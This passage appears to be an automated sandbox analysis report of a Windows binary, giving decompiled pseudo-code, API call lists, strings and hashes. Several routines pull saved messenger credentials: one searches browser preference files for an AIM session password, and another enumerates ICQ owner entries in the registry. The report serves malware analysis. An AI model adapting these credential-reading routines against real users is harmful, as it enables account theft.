                                								_t29 =  *_t37;
                                								if(_t29 == 0) {
                                									goto L8;
                                								}
                                								if(_t29 != _a12) {
                                									_t37 = _t37 + 4;
                                									continue;
                                								}
                                								goto L11;
                                							}
                                							goto L8;
                                						}
                                						L11:
                                					}
                                				} else {
                                					_push(_a12);
                                					sprintf(0x41e308, "menu_%d");
                                					_t31 = LoadMenuA(_a4, _a12);
                                					 *0x41e1fc =  *0x41e1fc & 0x00000000;
                                					_t46 = _t31;
                                					_push(1);
                                					_push(_t46);
                                					_push(_a12);
                                					E00408D47();
                                					DestroyMenu(_t46);
                                				}
                                				return 1;
                                			}











                                APIs
                                • sprintf.MSVCRT ref: 00408ECB
                                • LoadMenuA.USER32(?,?), ref: 00408ED9
                                  • Part of subcall function 00408D47: GetMenuItemCount.USER32(?), ref: 00408D5C
                                  • Part of subcall function 00408D47: memset.MSVCRT ref: 00408D7D
                                  • Part of subcall function 00408D47: GetMenuItemInfoA.USER32 ref: 00408DB8
                                  • Part of subcall function 00408D47: strchr.MSVCRT ref: 00408DCF
                                • DestroyMenu.USER32(00000000), ref: 00408EF7
                                • sprintf.MSVCRT ref: 00408F3B
                                • CreateDialogParamA.USER32(?,00000000,00000000,00408EA5,00000000), ref: 00408F50
                                • memset.MSVCRT ref: 00408F6C
                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 00408F7D
                                • EnumChildWindows.USER32(00000000,Function_00008E37,00000000), ref: 00408FA5
                                • DestroyWindow.USER32(00000000), ref: 00408FAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                • String ID: caption$dialog_%d$menu_%d
                                • API String ID: 3259144588-3822380221
                                • Opcode ID: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
                                • Instruction ID: 6ff3f41c44f65ef1366d905bf4693a1cca8442fec54ce1cacb3646534aec100a
                                • Opcode Fuzzy Hash: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
                                • Instruction Fuzzy Hash: 3B210F72500248FFDB12AF60DD45EEB3B69EB84709F14407EFA85A2190DA7949808B6D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E00409068(void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8) {
                                				void _v4103;
                                				char _v4104;
                                				int _t18;
                                				void* _t20;
                                				void* _t25;
                                				int _t27;
                                				void* _t29;
                                
                                				0x414060();
                                				0x413d0c(0x41e200, _a8, _t25, _t29, _t20);
                                				0x413d0c(0x41e308, "general");
                                				E00408CA1("TranslatorName", 0x417c88);
                                				E00408CA1("TranslatorURL", 0x417c88);
                                				E00408CA1("Version", 0x417c88);
                                				EnumResourceNamesA(_a4, 4, E00408EAA, 0);
                                				EnumResourceNamesA(_a4, 5, E00408EAA, 0);
                                				0x413d0c(0x41e308, "strings");
                                				_t27 = 0;
                                				_v4104 = 0;
                                				memset( &_v4103, 0, 0x1000);
                                				do {
                                					_t18 = LoadStringA(_a4, _t27,  &_v4104, 0x1000);
                                					if(_t18 > 0) {
                                						_t18 = E00408D0F(_t27,  &_v4104);
                                					}
                                					_t27 = _t27 + 1;
                                				} while (_t27 <= 0xffff);
                                				 *0x41e200 = 0;
                                				return _t18;
                                			}

                                APIs
                                • _mbscpy.MSVCRT ref: 00409080
                                • _mbscpy.MSVCRT ref: 00409090
                                  • Part of subcall function 00408CA1: memset.MSVCRT ref: 00408CC6
                                  • Part of subcall function 00408CA1: GetPrivateProfileStringA.KERNEL32(0041E308,?,00417C88,?,00001000,0041E200), ref: 00408CEA
                                  • Part of subcall function 00408CA1: WritePrivateProfileStringA.KERNEL32(0041E308,?,?,0041E200), ref: 00408D01
                                • EnumResourceNamesA.KERNEL32(?,00000004,Function_00008EAA,00000000), ref: 004090D1
                                • EnumResourceNamesA.KERNEL32(?,00000005,Function_00008EAA,00000000), ref: 004090DB
                                • _mbscpy.MSVCRT ref: 004090E3
                                • memset.MSVCRT ref: 004090FF
                                • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409113
                                  • Part of subcall function 00408D0F: _itoa.MSVCRT ref: 00408D30
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                • String ID: TranslatorName$TranslatorURL$Version$general$strings
                                • API String ID: 1035899707-2179912348
                                • Opcode ID: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
                                • Instruction ID: 8f59c47c41e75b0ef1e028ad246d3c9450943cc5e9d1e56adfa21ee2aa94ac58
                                • Opcode Fuzzy Hash: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
                                • Instruction Fuzzy Hash: 4211E93164025879E7212717EC4AFCB3E6C9F85B59F14407FBA49BA0C1CABD99C086BC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0041115C,00404495,00000000,00000000,00000000), ref: 0041103A
                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00411053
                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00411064
                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00411075
                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00411086
                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00411097
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                • API String ID: 667068680-3953557276
                                • Opcode ID: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
                                • Instruction ID: 36442a69f5807846e20e8f789375593bd69b00a93b3bf86530e8c97bdb066b37
                                • Opcode Fuzzy Hash: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
                                • Instruction Fuzzy Hash: 46F01D39E00362DD97209B26BD40BE73EE5578DB80715803BE908D2264DBB894C38FAD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 56%
                                			E00405C4E(signed int _a4) {
                                				signed int _v8;
                                				signed int _v12;
                                				void* _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				intOrPtr _v32;
                                				void* _v36;
                                				intOrPtr _v40;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				intOrPtr _v52;
                                				struct tagRECT _v68;
                                				void _v323;
                                				char _v324;
                                				intOrPtr _v4612;
                                				char _v8864;
                                				struct HWND__* _v10984;
                                				void* __ebx;
                                				_Unknown_base(*)()* _t75;
                                				void* _t78;
                                				struct HINSTANCE__* _t91;
                                				intOrPtr* _t99;
                                				signed int _t101;
                                				intOrPtr* _t106;
                                				intOrPtr _t107;
                                				void* _t109;
                                				void* _t110;
                                
                                				0x414060();
                                				_v12 = 8;
                                				SetRect( &_v68, 1, 1, 1, 1);
                                				if(MapDialogRect( *(_a4 + 4),  &_v68) != 0) {
                                					_v12 = _v68.top << 2;
                                				}
                                				_v8 = _v8 & 0;
                                				_v32 = 0x3ed;
                                				_v28 = 0x3ef;
                                				_v24 = 0x3ee;
                                				_v20 = 0x3f0;
                                				asm("stosd");
                                				_v52 = 0xb02c;
                                				_v48 = 0xb090;
                                				_v44 = 0xb0f4;
                                				_v40 = 0xb158;
                                				asm("stosd");
                                				_t99 =  &_v8864;
                                				do {
                                					E00402AA8(_a4,  *((intOrPtr*)(_t109 + _v8 - 0x1c)));
                                					0x4134d0();
                                					_v8 = _v8 + 4;
                                					 *_t99 =  *((intOrPtr*)(_t109 + _v8 - 0x30));
                                					_t99 = _t99 + 0x854;
                                				} while (_v8 < 0x14);
                                				_v8 = _v8 & 0x00000000;
                                				do {
                                					_a4 = _a4 & 0x00000000;
                                					do {
                                						_t101 = _a4 * 0x854;
                                						_t106 = _t109 + _t101 - 0x2ae4;
                                						0x4135a8();
                                						if(_a4 == 0) {
                                							_v324 = 0;
                                							memset( &_v323, 0, 0xff);
                                							_push(E0040876F(_v8 + 0x515));
                                							sprintf( &_v324, "%s:");
                                							_t110 = _t110 + 0x18;
                                							SetWindowTextA(_v10984,  &_v324);
                                						}
                                						_t107 =  *_t106;
                                						_t91 = LoadLibraryA("shlwapi.dll");
                                						_t75 = GetProcAddress(_t91, "SHAutoComplete");
                                						if(_t75 != 0) {
                                							 *_t75(_t107, 0x10000001);
                                						}
                                						FreeLibrary(_t91);
                                						 *((intOrPtr*)(_t109 + _t101 - 0x229c)) =  *((intOrPtr*)(_t109 + _t101 - 0x229c)) + 1;
                                						_t78 = _v4612 + _v12;
                                						 *((intOrPtr*)(_t109 + _t101 - 0x22a0)) =  *((intOrPtr*)(_t109 + _t101 - 0x22a0)) + _t78;
                                						_a4 = _a4 + 1;
                                					} while (_a4 < 5);
                                					_v8 = _v8 + 1;
                                				} while (_v8 < 7);
                                				return _t78;
                                			}

                                APIs
                                • SetRect.USER32(?,00000001,00000001,00000001,00000001), ref: 00405C6D
                                • MapDialogRect.USER32(?,?), ref: 00405C7D
                                • memset.MSVCRT ref: 00405D4B
                                • sprintf.MSVCRT ref: 00405D6E
                                • SetWindowTextA.USER32(?,?), ref: 00405D83
                                • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED), ref: 00405D90
                                • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00405D9E
                                • FreeLibrary.KERNEL32(00000000), ref: 00405DB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: LibraryRect$AddressDialogFreeLoadProcTextWindowmemsetsprintf
                                • String ID: %s:$SHAutoComplete$shlwapi.dll
                                • API String ID: 2601263068-2802052640
                                • Opcode ID: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
                                • Instruction ID: b550a958d3f196041ff417ee8ca2f57d98087dd1caa8e181cbf0d69f42a088e7
                                • Opcode Fuzzy Hash: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
                                • Instruction Fuzzy Hash: D0410B71A00209EFDB11DF94DC496EEBBB8EF48309F10846AE905B7251D7789A858F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
                                • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
                                • strlen.MSVCRT ref: 00411C15
                                • strlen.MSVCRT ref: 00411C22
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressHandleModuleProcstrlen
                                • String ID: GetProcAddress$LdrGetProcedureAddress$PJ@$kernel32.dll$ntdll.dll
                                • API String ID: 1027343248-251837621
                                • Opcode ID: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
                                • Instruction ID: 714763e50c761412b950203b9ac78bff84e38b84e40515d0a0e54eee0800bd5e
                                • Opcode Fuzzy Hash: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
                                • Instruction Fuzzy Hash: D2113072D0021CBBCB11EFE5DC45ADEBBB9EF48310F114467E500B7250E7B99A408B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _mbscpy
                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                • API String ID: 714388716-318151290
                                • Opcode ID: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
                                • Instruction ID: ab6a2e7572a39428c533488b1ae62aae3229acca50d317451570c8424bb0716c
                                • Opcode Fuzzy Hash: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
                                • Instruction Fuzzy Hash: 52F0F931A986077039690628AF1EAFF0101A429B4577445D7A402E07D1C9FD8FF2A05F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E0040E293(void* __eflags, intOrPtr* _a4, int _a8) {
                                				void* _v8;
                                				char _v12;
                                				void* _v16;
                                				long _v20;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				char _v284;
                                				char _v540;
                                				void _v1553;
                                				void _v1563;
                                				char _v1564;
                                				void _v2588;
                                				char _v3611;
                                				void _v3612;
                                				void* __ebx;
                                				void* __edi;
                                				void* _t52;
                                				int _t57;
                                				void* _t64;
                                				void* _t66;
                                				void* _t67;
                                				void* _t83;
                                				intOrPtr* _t88;
                                				intOrPtr _t105;
                                				char _t107;
                                				void* _t109;
                                				int _t113;
                                				long _t116;
                                				void* _t117;
                                				void* _t118;
                                				intOrPtr* _t119;
                                				void* _t120;
                                
                                				_t52 = E004067BA(_a8);
                                				_pop(_t95);
                                				_v8 = _t52;
                                				if(_t52 != 0xffffffff) {
                                					_t116 = GetFileSize(_t52, 0);
                                					if(_t116 < 0x100000) {
                                						_t3 = _t116 + 1; // 0x1
                                						_t57 = _t3;
                                						0x413d5c();
                                						_t109 = _t57;
                                						 *_t119 = 0x3ff;
                                						_v16 = _t109;
                                						_v12 = 0;
                                						_v1564 = 0;
                                						memset( &_v1563, 0, _t57);
                                						_t120 = _t119 + 0xc;
                                						 *_t109 = 0;
                                						ReadFile(_v8, _t109, _t116,  &_v20, 0);
                                						 *((char*)(_t109 + _t116)) = 0;
                                						while(1) {
                                							_t64 = E00407193(_t109, _t95,  &_v1564, 0x3ff,  &_v12);
                                							_t120 = _t120 + 0xc;
                                							if(_t64 == 0) {
                                								break;
                                							}
                                							_t66 = E00407139(0, "user_pref(\"");
                                							_pop(_t95);
                                							if(_t66 == 0) {
                                								_push(0x417ddc);
                                								_t67 = 0xb;
                                								_t13 = E00407139(_t67) - 0xb; // -11
                                								_t95 = _t13;
                                								_a8 = _t95;
                                								if(_t95 > 0) {
                                									_t117 = E00407139(E00407139(_t68 + 1, 0x417de4) + 1, 0x417ddc);
                                									_pop(_t95);
                                									if(_t117 > 0) {
                                										_t17 = _t117 + 1; // 0x1
                                										_t113 = E00407139(_t17, 0x417ddc) - _t117 - 1;
                                										_pop(_t95);
                                										if(_t113 > 0) {
                                											memcpy( &_v2588,  &_v1553, _a8);
                                											 *((char*)(_t118 + _a8 - 0xa18)) = 0;
                                											memcpy( &_v3612, _t118 + _t117 - 0x617, _t113);
                                											_t95 =  &_v2588;
                                											 *((char*)(_t118 + _t113 - 0xe18)) = 0;
                                											_t83 = E00407139(0, ".aim.session.password");
                                											_t120 = _t120 + 0x1c;
                                											if(_t83 > 0) {
                                												 *((char*)(_t118 + _t83 - 0xa18)) = 0;
                                												_v540 = 0;
                                												_v284 = 0;
                                												_v28 = 0;
                                												_v24 = 0;
                                												E00406958(0xff,  &_v540,  &_v2588);
                                												E004029D9( &_v3611,  &_v284, 0xff);
                                												_t107 = _v540;
                                												_t105 = 2;
                                												_v28 = _t105;
                                												_t88 =  &_v540;
                                												while(_t107 != 0) {
                                													if(_t107 < 0x30 || _t107 > 0x39) {
                                														_v24 = _t105;
                                													} else {
                                														_t88 = _t88 + 1;
                                														_t107 =  *_t88;
                                														continue;
                                													}
                                													L15:
                                													_t95 = _a4;
                                													 *((intOrPtr*)( *_a4))( &_v540);
                                													goto L16;
                                												}
                                												_v24 = 3;
                                												goto L15;
                                											}
                                										}
                                									}
                                								}
                                							}
                                							L16:
                                							_t109 = _v16;
                                						}
                                						0x413d56(_t109);
                                					}
                                					CloseHandle(_v8);
                                				}
                                				return 1;
                                			}

                                APIs
                                  • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040E2B8
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040E2D0
                                • memset.MSVCRT ref: 0040E2F2
                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040E306
                                • memcpy.MSVCRT ref: 0040E3AC
                                • memcpy.MSVCRT ref: 0040E3CB
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49D
                                • CloseHandle.KERNEL32(?), ref: 0040E4A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: File$memcpy$??2@??3@CloseCreateHandleReadSizememset
                                • String ID: .aim.session.password$user_pref("
                                • API String ID: 1009687194-2166142864
                                • Opcode ID: dc577dbf4ddbf8b447914fb03024d9040712cde61aa19fb03e9770e00e26eb45
                                • Instruction ID: 9dacb5a7e7bcd3ea0486815f95980eeefdadcc55de365010cf028b87c9f312c9
                                • Opcode Fuzzy Hash: dc577dbf4ddbf8b447914fb03024d9040712cde61aa19fb03e9770e00e26eb45
                                • Instruction Fuzzy Hash: 2451167280410D9ECB10DF65DC85AEE7BB9AF44314F1404BFE445B7281EA385F98CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 35%
                                			E0040D794(intOrPtr* _a4, void* _a8, intOrPtr _a12) {
                                				char _v12;
                                				int _v16;
                                				void* _v20;
                                				long _v24;
                                				int _v28;
                                				char _v44;
                                				void _v303;
                                				char _v304;
                                				intOrPtr _v308;
                                				intOrPtr _v312;
                                				char _v568;
                                				char _v824;
                                				void _v1079;
                                				int _v1080;
                                				void* __ebx;
                                				void** _t45;
                                				char* _t49;
                                				long _t51;
                                				long _t55;
                                				long _t62;
                                				long _t68;
                                				int _t70;
                                				int _t76;
                                				void* _t78;
                                				void* _t79;
                                				void* _t80;
                                				void* _t81;
                                
                                				_t45 =  &_a8;
                                				_v24 = 1;
                                				0x411d68(_a8, "Software\Mirabilis\ICQ\NewOwners", _t45);
                                				_t79 = _t78 + 0xc;
                                				if(_t45 == 0) {
                                					_t70 = 0;
                                					_v12 = 0;
                                					_v304 = 0;
                                					memset( &_v303, 0, 0xff);
                                					_t80 = _t79 + 0xc;
                                					_t49 =  &_v304;
                                					_push(_t49);
                                					_push(0);
                                					while(1) {
                                						0x411dee(_a8);
                                						_t81 = _t80 + 0xc;
                                						if(_t49 != 0) {
                                							break;
                                						}
                                						_t51 =  &_v304;
                                						0x411d68(_a8, _t51,  &_v20);
                                						_t80 = _t81 + 0xc;
                                						__eflags = _t51;
                                						if(_t51 != 0) {
                                							L10:
                                							_t38 =  &_v12;
                                							 *_t38 = _v12 + 1;
                                							__eflags =  *_t38;
                                							_t49 =  &_v304;
                                							_push(_t49);
                                							_push(_v12);
                                							continue;
                                						} else {
                                							_v16 = 0x10;
                                							_t55 = RegQueryValueExA(_v20, "MainLocation", _t70,  &_v28,  &_v44,  &_v16);
                                							__eflags = _t55;
                                							if(_t55 != 0) {
                                								L9:
                                								RegCloseKey(_v20);
                                								goto L10;
                                							} else {
                                								_t76 = atoi( &_v304);
                                								__eflags = _t76 - _t70;
                                								if(_t76 <= _t70) {
                                									goto L9;
                                								} else {
                                									__eflags = _v16 - 8;
                                									if(__eflags < 0) {
                                										goto L9;
                                									} else {
                                										_v1080 = _t70;
                                										memset( &_v1079, _t70, 0xff);
                                										_t80 = _t80 + 0xc;
                                										_t62 = E0040807D( &_v1080, __eflags, _t76, _a12,  &_v44, _v16);
                                										__eflags = _t62;
                                										if(_t62 == 0) {
                                											L8:
                                											_t70 = 0;
                                											__eflags = 0;
                                											goto L9;
                                										} else {
                                											_v824 = 0;
                                											_v568 = 0;
                                											_v312 = 0;
                                											_v308 = 0;
                                											0x413d0c( &_v568,  &_v1080);
                                											0x413d0c( &_v824,  &_v304);
                                											_t80 = _t80 + 0x10;
                                											_v308 = 3;
                                											_v312 = 8;
                                											_t68 =  *((intOrPtr*)( *_a4))( &_v824);
                                											__eflags = _t68;
                                											_v24 = _t68;
                                											if(_t68 != 0) {
                                												goto L8;
                                											}
                                										}
                                									}
                                								}
                                							}
                                						}
                                						break;
                                					}
                                					RegCloseKey(_a8);
                                				}
                                				return _v24;
                                			}

                                APIs
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                • atoi.MSVCRT ref: 0040D840
                                • memset.MSVCRT ref: 0040D869
                                • _mbscpy.MSVCRT ref: 0040D8B3
                                • _mbscpy.MSVCRT ref: 0040D8C6
                                • RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                • memset.MSVCRT ref: 0040D7DC
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Close_mbscpymemset$EnumOpenQueryValueatoi
                                • String ID: MainLocation$Software\Mirabilis\ICQ\NewOwners
                                • API String ID: 2897902629-2277304809
                                • Opcode ID: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
                                • Instruction ID: e76a91e7ade9601acab1c04a0be11c20e8a13b6e7dda126cd817bcb1d0c6ed36
                                • Opcode Fuzzy Hash: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
                                • Instruction Fuzzy Hash: E841EFB2D0111DAEDF11EF95DC85ADEBBBCAF09304F4040AAE909E2151E7349B58CF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • strchr.MSVCRT ref: 0041118A
                                • _mbscpy.MSVCRT ref: 00411198
                                  • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
                                  • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
                                  • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
                                • _mbscpy.MSVCRT ref: 004111E8
                                • _mbscat.MSVCRT ref: 004111F3
                                • memset.MSVCRT ref: 004111CF
                                  • Part of subcall function 00406BC3: GetWindowsDirectoryA.KERNEL32(0041E458,00000104,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BD8
                                  • Part of subcall function 00406BC3: _mbscpy.MSVCRT ref: 00406BE8
                                • memset.MSVCRT ref: 00411217
                                • memcpy.MSVCRT ref: 00411232
                                • _mbscat.MSVCRT ref: 0041123D
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                • String ID: \systemroot
                                • API String ID: 912701516-1821301763
                                • Opcode ID: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
                                • Instruction ID: 1deae77e6ad71c1ffcfab25ec4cb50ddae9004d97205ddf1ac571f940d5d67aa
                                • Opcode Fuzzy Hash: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
                                • Instruction Fuzzy Hash: F921D77150820479EB60A7619C83FEBB7EC4F15709F10409FF789E10C1EAACABC5466A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E004068B5(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                				long _v8;
                                				void* _v12;
                                				long _v16;
                                				void* _t14;
                                				void* _t20;
                                				void* _t28;
                                				void* _t33;
                                				long _t35;
                                
                                				_v8 = _v8 & 0x00000000;
                                				EmptyClipboard();
                                				_t14 = E004067BA(_a4);
                                				_v12 = _t14;
                                				if(_t14 == 0xffffffff) {
                                					_v8 = GetLastError();
                                				} else {
                                					_t35 = GetFileSize(_t14, 0);
                                					_t5 = _t35 + 1; // 0x1
                                					_t20 = GlobalAlloc(0x2000, _t5);
                                					_t28 = _t20;
                                					if(_t28 == 0) {
                                						L4:
                                						_v8 = GetLastError();
                                					} else {
                                						GlobalFix(_t28);
                                						_t33 = _t20;
                                						if(ReadFile(_v12, _t33, _t35,  &_v16, 0) == 0) {
                                							goto L4;
                                						} else {
                                							 *((char*)(_t33 + _t35)) = 0;
                                							GlobalUnWire(_t28);
                                							SetClipboardData(1, _t28);
                                						}
                                					}
                                					CloseHandle(_v12);
                                				}
                                				CloseClipboard();
                                				return _v8;
                                			}

                                APIs
                                • EmptyClipboard.USER32 ref: 004068BF
                                  • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004068DC
                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 004068ED
                                • GlobalFix.KERNEL32(00000000), ref: 004068FA
                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040690D
                                • GlobalUnWire.KERNEL32(00000000), ref: 0040691C
                                • SetClipboardData.USER32(00000001,00000000), ref: 00406925
                                • GetLastError.KERNEL32 ref: 0040692D
                                • CloseHandle.KERNEL32(?), ref: 00406939
                                • GetLastError.KERNEL32 ref: 00406944
                                • CloseClipboard.USER32 ref: 0040694D
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                • String ID:
                                • API String ID: 2565263379-0
                                • Opcode ID: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
                                • Instruction ID: 43236b9afd726b755d45991aac83c0a8e3bcf6aaaa4f317cb2ebd178168b56f4
                                • Opcode Fuzzy Hash: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
                                • Instruction Fuzzy Hash: 07113D75904605FBD7116FA4AD4CBDE7FB8EB88325F108075F902E2290DB748944CA69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 20%
                                			E004088D4(void* __ecx, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
                                				char* _v0;
                                				int _v4;
                                				int _t38;
                                				char* _t48;
                                				void* _t50;
                                				void* _t57;
                                				int _t62;
                                				intOrPtr _t63;
                                				signed int _t68;
                                				signed int _t69;
                                
                                				_t57 = __ecx;
                                				_t69 = _t68 & 0xfffffff8;
                                				0x414060();
                                				_t38 = GetMenuItemCount(_a8.cbSize);
                                				_a4 = _t38;
                                				_v4 = 0;
                                				if(_t38 <= 0) {
                                					L15:
                                					return _t38;
                                				} else {
                                					do {
                                						memset( &_a57, 0, 0x1000);
                                						_t69 = _t69 + 0xc;
                                						_a44 =  &_a56;
                                						_a8.cbSize = 0x30;
                                						_a12 = 0x36;
                                						_a48 = 0x1000;
                                						_a56 = 0;
                                						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
                                							goto L14;
                                						}
                                						if(_a56 == 0) {
                                							L12:
                                							if(_a28 != 0) {
                                								_push(0);
                                								_push(_a28);
                                								_push(_a4);
                                								E004088D4(_t57);
                                								_t69 = _t69 + 0xc;
                                							}
                                							goto L14;
                                						}
                                						_t62 = _a24;
                                						_a4160 = 0;
                                						memset( &_a4161, 0, 0x1000);
                                						_t48 = strchr( &_a56, 9);
                                						_t69 = _t69 + 0x14;
                                						_v0 = _t48;
                                						if(_a28 != 0) {
                                							if(_a12 == 0) {
                                								 *0x41e1fc =  *0x41e1fc + 1;
                                								_t63 =  *0x41e1fc; // 0x0
                                								_t62 = _t63 + 0x11558;
                                							} else {
                                								_t62 = _v4 + 0x11171;
                                							}
                                						}
